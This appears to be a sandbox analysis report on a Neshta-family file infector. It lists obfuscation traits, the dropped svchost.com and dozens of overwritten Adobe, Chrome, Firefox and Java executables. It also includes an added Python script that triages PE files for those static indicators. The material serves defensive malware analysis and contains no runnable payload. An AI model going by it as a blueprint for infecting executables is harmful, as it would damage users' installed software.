Source: C:\Users\Public\vbc.exe Code function: 5_2_00406CE0 push 00406D36h; ret 5_2_00406D2E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403D28 push 00403D79h; ret 5_2_00403D71
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403F58 push 00403F84h; ret 5_2_00403F7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403F90 push 00403FBCh; ret 5_2_00403FB4
Source: initial sample Static PE information: section name: .text entropy: 7.78687431178
Source: initial sample Static PE information: section name: .text entropy: 7.78687431178
Source: initial sample Static PE information: section name: .text entropy: 6.88560633445
Source: initial sample Static PE information: section name: .text entropy: 7.00368298001
Source: initial sample Static PE information: section name: .text entropy: 7.00336954384
Source: initial sample Static PE information: section name: .text entropy: 7.4909885878
Source: initial sample Static PE information: section name: .text entropy: 7.49148131754
Source: initial sample Static PE information: section name: .text entropy: 6.8868280667
Source: initial sample Static PE information: section name: .text entropy: 7.12964019221
Source: initial sample Static PE information: section name: .text entropy: 6.95263910497
Source: initial sample Static PE information: section name: .text entropy: 7.34326857021
Source: initial sample Static PE information: section name: .text entropy: 7.17347995787
Source: initial sample Static PE information: section name: .text entropy: 7.84217762577
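The static indicators listed above (PE files with no import functions, data appended after the last section, .text sections with entropy near 8, and push/ret sequences that act as jumps) are all cheap to check without a sandbox. The script below is an added example, not code from the Joe Sandbox report, that reads the PE headers with the standard library only and reports those four indicators for any file; build_demo_pe() constructs a minimal PE32 image so it can be exercised offline, and the two demo images at the end are constructed inputs, not the report's samples.

```python
"""Static triage for the indicators this report lists on the dropped PE files:
no import functions, data appended after the last section (an overlay),
.text entropy, and 'push imm32 ... ret' sequences that jump inside .text.
Added example, not part of the report; standard library only, no pefile.
The demo images built at the bottom are constructed, not the report's samples.
"""
import math
import struct

FILE_ALIGN = 0x200


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0; packed or encrypted code sits near 8."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """Read only the headers the checks need; ValueError if it is not a PE."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    hdr = struct.unpack_from("<HHIIIHH", blob, coff)      # COFF file header
    nsec, opt_size = hdr[1], hdr[5]
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:                                    # PE32
        image_base = struct.unpack_from("<I", blob, opt + 28)[0]
        ndirs, dirs = struct.unpack_from("<I", blob, opt + 92)[0], opt + 96
    elif magic == 0x20B:                                  # PE32+
        image_base = struct.unpack_from("<Q", blob, opt + 24)[0]
        ndirs, dirs = struct.unpack_from("<I", blob, opt + 108)[0], opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # Data directory 1 is the import table; size 0 means no import functions.
    import_size = struct.unpack_from("<II", blob, dirs + 8)[1] if ndirs > 1 else 0
    sections, end = [], 0
    for i in range(nsec):
        name, vsize, va, rsize, ptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va, "vsize": vsize,
                         "data": blob[ptr:ptr + min(rsize, vsize)]})  # mapped bytes, no alignment padding
        end = max(end, ptr + rsize)
    return {"image_base": image_base, "import_size": import_size,
            "sections": sections, "overlay": max(0, len(blob) - end)}


def find_push_ret(section: dict, image_base: int, window: int = 32) -> list:
    """(address, target) of each 'push imm32' whose operand lies inside the section
    and that is followed by a 'ret' within `window` bytes: a ret-based jump, the
    call/push/ret obfuscation the report lists. A heuristic, so expect some noise."""
    data, lo = section["data"], image_base + section["va"]
    hi, hits = lo + section["vsize"], []
    for i in range(len(data) - 4):
        if data[i] != 0x68:
            continue
        target = struct.unpack_from("<I", data, i + 1)[0]
        if lo <= target < hi and 0xC3 in data[i + 5:i + 5 + window]:
            hits.append((lo + i, target))
    return hits


def triage(blob: bytes) -> dict:
    pe = parse_pe(blob)
    text = next((s for s in pe["sections"] if s["name"] == ".text"), None)
    return {"no_imports": pe["import_size"] == 0,
            "overlay_bytes": pe["overlay"],
            "text_entropy": shannon_entropy(text["data"]) if text else None,
            "push_ret_jumps": len(find_push_ret(text, pe["image_base"])) if text else 0}


def build_demo_pe(text: bytes, overlay: bytes = b"", with_imports: bool = True) -> bytes:
    """Constructed minimal PE32: one .text section at RVA 0x1000, image base 0x400000."""
    base, text_va = 0x400000, 0x1000
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, one section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 16, text_va)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, base)                         # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)          # Section / File alignment
    struct.pack_into("<II", opt, 56, 0x2000, FILE_ALIGN)          # SizeOfImage / SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                           # NumberOfRvaAndSizes
    if with_imports:  # an import directory entry; only its size matters to triage()
        struct.pack_into("<II", opt, 104, text_va + 0x100, 40)
    raw = -(-len(text) // FILE_ALIGN) * FILE_ALIGN
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_va, raw, FILE_ALIGN, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + sec).ljust(FILE_ALIGN, b"\0")
    return headers + text.ljust(raw, b"\0") + overlay


# Constructed inputs. The first mimics the dropped files in the report: a ret-based
# jump stub, a maximum-entropy body, no imports and a payload in the overlay.
RET_JUMP_STUB = b"\x68" + struct.pack("<I", 0x401010) + b"\xC3"   # push 0x401010 ; ret
DEMO_INFECTED = build_demo_pe(RET_JUMP_STUB + bytes(range(256)),
                              overlay=b"<constructed host program>", with_imports=False)
DEMO_CLEAN = build_demo_pe(b"\x55\x8B\xEC\x33\xC0\x5D\xC3")   # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret

if __name__ == "__main__":
    for label, blob in (("infected-like", DEMO_INFECTED), ("clean", DEMO_CLEAN)):
        print(label, triage(blob))
```

Run triage(open(path, "rb").read()) over the files the report lists as "PE file does not import any functions". A legitimate installer or updater imports at least kernel32, so a zero-size import directory combined with an overlay across dozens of third-party executables is the signature of an infector that overwrote the host and stashed the original behind the last section, not of a packer applied by the vendor.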

Persistence and Installation Behavior:

Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\updater.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\windirstat.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\Uninstall.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe
Drops PE files with a suspicious file extension
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com
Drops executable to a common third party application directory
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\updater.exe
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe
Source: C:\Users\Public\vbc.exe File written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\updater.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\WinDirStat\windirstat.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\WinDirStat\Uninstall.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe
